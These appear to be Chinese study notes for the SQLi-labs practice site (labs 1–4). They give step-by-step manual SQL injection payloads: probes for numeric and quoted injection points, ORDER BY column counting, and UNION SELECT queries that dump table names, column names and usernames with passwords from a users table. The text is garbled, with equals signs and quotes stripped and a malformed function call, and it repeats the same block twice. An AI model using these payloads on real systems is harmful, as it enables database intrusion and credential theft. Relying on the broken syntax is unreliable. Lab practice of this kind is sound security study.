SQLi-lab注意注入中的数字型和字符型顺序测试语句目的第1步?id1 and 11测数字型第2步?id1 and 12确认数字型页面变化第3步?id1 and 11 --测单引号闭合第4步?id1) and 11 --测单引号括号第5步?id1 and 11 --测双引号闭合第6步?id1) and 11 --测双引号括号从 ”数字型”到 到 ) 到 )) 到 到 ) 到 ))看页面反应反应说明报错有注入点可能是字符型正常显示可能是数字型或者单引号被过滤空白也可能有注入(第1~3步,判断类型)通过order by 来判断列数union 联合注入负数 union select 1,2,databse) --查询数据库负数 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity爆表,group_concat(column_name) from information_schema.columns where table_nameusers爆段名group_concat(username,password) from users获取该字段内容
sqlmap工具的使用与手工注入-lab1-4
SQLi-lab注意注入中的数字型和字符型顺序测试语句目的第1步?id1 and 11测数字型第2步?id1 and 12确认数字型页面变化第3步?id1 and 11 --测单引号闭合第4步?id1) and 11 --测单引号括号第5步?id1 and 11 --测双引号闭合第6步?id1) and 11 --测双引号括号从 ”数字型”到 到 ) 到 )) 到 到 ) 到 ))看页面反应反应说明报错有注入点可能是字符型正常显示可能是数字型或者单引号被过滤空白也可能有注入(第1~3步,判断类型)通过order by 来判断列数union 联合注入负数 union select 1,2,databse) --查询数据库负数 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity爆表,group_concat(column_name) from information_schema.columns where table_nameusers爆段名group_concat(username,password) from users获取该字段内容
